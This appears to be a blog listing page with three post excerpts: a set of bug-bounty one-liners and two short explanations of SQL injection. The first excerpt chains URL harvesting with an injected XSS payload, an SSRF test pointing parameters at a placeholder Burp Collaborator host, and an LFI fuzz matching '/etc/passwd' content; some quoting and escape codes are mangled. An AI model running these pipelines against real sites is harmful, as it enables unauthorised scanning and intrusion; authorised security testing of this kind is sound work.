Posts

Showing posts from March 20, 2021

Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

What Is an SQL Injection? And its Types?

 What Is an SQL Injection?  Now a days, most of the websites you would come across are dynamic, which means that they take the user input and act upon it. When the user supplies an input to the application, it is parsed by the interpreter, where the user-supplied input is combined with the application code. An SQL injection occurs when the user-supplied input or query is considered as a database query; in simple words, the input is not filtered by the application, which means that an attacker could inject malicious code in the application that would be parsed by the interpreter as an SQL statement resulting in an SQL injection flaw. This will then allow an attacker to conduct a wide variety of attacks. SQL, LDAP, and XPath injection all fell down in the “Injection attacks” category which secure the first spot inside the OWASP 2013 Top 10 attacks . Types of SQL Injection  The following are the three types of SQL injection attacks: Union-Based SQL Injection   Th...

What is SQL injection (SQLi)?

 What is SQL injection (SQLi)? SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior. 

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to find index of the Array in C